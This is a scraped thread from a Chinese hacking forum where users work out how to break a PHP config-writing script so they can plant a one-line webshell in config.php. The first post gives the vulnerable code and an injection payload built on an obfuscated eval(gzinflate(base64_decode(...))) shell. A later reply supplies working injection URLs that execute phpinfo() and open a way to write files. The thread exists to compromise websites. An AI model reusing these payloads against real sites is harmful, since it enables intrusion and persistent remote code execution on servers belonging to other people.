[讨论]如何突破这段代码写入一句话[更新]
[讨论]如何突破这段代码写入一句话[更新]信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
这里先向楼下回帖的朋友道个歉,由于发帖时疏忽,没有仔细看代码,导致代码发错。
环境如下:
PHP中的magic_quotes_gpc为on
原来发错的代码:
<?
$fp = @fopen("config.php", "w");
$myarrs = $_REQUEST["conf"];
if (isset($fp)) {
@fputs($fp, "<?php\n// Created ".date("Y-m-d H:i:s")."\n\n");
$forbidden_values = array('{', '}', '$');
foreach ($myarrs as $key => $value) {
$value = str_replace($forbidden_values, '', $value);
@fputs($fp, "// ".$Site_conF[$key][1]."\n\$S_conf[\"".$key."\"] = \"".str_replace('"', '\\"', $value)."\";\n\n");
}
@fclose($fp);
print "<div align=\"center\"><strong>config_saved</strong></div>";
} else {
print "<div align=\"center\"><strong>FAIL</strong></div>";
}
@fclose($fp);
?>
现在需要突破的代码是:]
< ?
$fp = @fopen("config.php", "w");
$arrVar = $_REQUEST["conf"];
if (isset($fp)) {
@fputs($fp, "<?php \n# Created ".date("Y-m-d H:i:s")."\n\n");
foreach ($arrVar as $key => $value) {
@fputs($fp, "// ".$S_CONF[$key][1]."\n\$S_CONF[\"".$key."\"] = \"".htmlspecialchars($value)."\";\n\n");
}
@fputs($fp, "\n?>");
@fclose($fp);
print "<div align=\"center\"><strong>config_saved</strong></div>";
}
else {
print "<div align=\"center\"><strong>entryins_fail</strong></div>";
}
@fclose($fp);
?>
实现目的:在config.php里写入一句话,能成功连接。
对原来发错的代码,由于它在CONN里的对单引号作了stripcslashes处理,所以,我的突破思路是用压缩方法 传递如下参数:
\";?>
<?php
eval(gzinflate(gzuncompress(base64_decode('eJzz1vU+czGgk/8DP1+nnqant17n1S1sDABh6QgQ'))))
?>
对于现在需要突破的这个代码,我仍无法解决,请大家讨论。TTFCT http://WWW.TTFCT.COM
[url=http://wpa.qq.com/msgrd?V=1&Uin=420079600&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子279 精华[url=http://forum.eviloctal.com/digest.php?authorid=32116]4[/url] 积分4349 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=32116]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=鲜花预定&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]爱要怎么说出口[/url]
[url=http://forum.eviloctal.com/space-uid-66411.html]hackest[/url] [img]http://forum.eviloctal.com/customavatars/66411.gif[/img]
运维管理组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 不在我能力范围之内,爱莫能助 [img]http://forum.eviloctal.com/images/smilies/yangcong/60.gif[/img][img]http://forum.eviloctal.com/images/smilies/yangcong/59.gif[/img]My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=297521327&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子882 精华[url=http://forum.eviloctal.com/digest.php?authorid=66411]20[/url] 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 [url=http://www.hackest.cn/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=66411]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]
[url=http://forum.eviloctal.com/space-uid-32116.html]ttfct[/url] [img]http://forum.eviloctal.com/customavatars/32116.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 会PHP的朋友都来看看,看有方法突破不TTFCT http://WWW.TTFCT.COM
[url=http://wpa.qq.com/msgrd?V=1&Uin=420079600&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子279 精华[url=http://forum.eviloctal.com/digest.php?authorid=32116]4[/url] 积分4349 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=32116]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-64114.html]小贼[/url] [img]http://forum.eviloctal.com/customavatars/64114.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 好象也不在俺滴管辖范围内[img]http://forum.eviloctal.com/images/smilies/yangcong/62.gif[/img]webblog: http://hi.baidu.com/zei86/
[url=http://wpa.qq.com/msgrd?V=1&Uin=455038&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子146 精华[url=http://forum.eviloctal.com/digest.php?authorid=64114]1[/url] 积分3148 阅读权限100 在线时间59 小时 注册时间2006-9-17 最后登录2008-6-29 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=64114]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-1258.html]剑心[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 本来这种写法是非常好的!!!赞个,但是他逻辑上存在点小问题导致可以轻易写shell,在你这个条件下
复制内容到剪贴板
代码:
fuck.php?conf[a]=abc";phpinfo();//
如果方便希望能说下这个脚本的名字
谢谢
帖子83 精华[url=http://forum.eviloctal.com/digest.php?authorid=1258]0[/url] 积分3045 阅读权限100 在线时间84 小时 注册时间2005-1-2 最后登录2008-4-11 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1258]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-1258.html]剑心[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 可能没说到位,上面能证明可以用函数了,不过不允许用变量那么就简单了
fuck.php?conf[a]=abc";fputs(fopen(urldecode(")))//
自己发挥吧
帖子83 精华[url=http://forum.eviloctal.com/digest.php?authorid=1258]0[/url] 积分3045 阅读权限100 在线时间84 小时 注册时间2005-1-2 最后登录2008-4-11 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1258]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-1258.html]剑心[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 仔细想写会发现他这个等于没过滤 :) 呵呵
有意思的脚本
帖子83 精华[url=http://forum.eviloctal.com/digest.php?authorid=1258]0[/url] 积分3045 阅读权限100 在线时间84 小时 注册时间2005-1-2 最后登录2008-4-11 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1258]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-32116.html]ttfct[/url] [img]http://forum.eviloctal.com/customavatars/32116.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 给楼上的道个歉,我把代码发错了。TTFCT http://WWW.TTFCT.COM
[url=http://wpa.qq.com/msgrd?V=1&Uin=420079600&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子279 精华[url=http://forum.eviloctal.com/digest.php?authorid=32116]4[/url] 积分4349 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=32116]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-76577.html]aosemp[/url] [img]http://forum.eviloctal.com/images/avatars/pw/god1.gif[/img]
晶莹剔透§烈日灼然
页:
[1]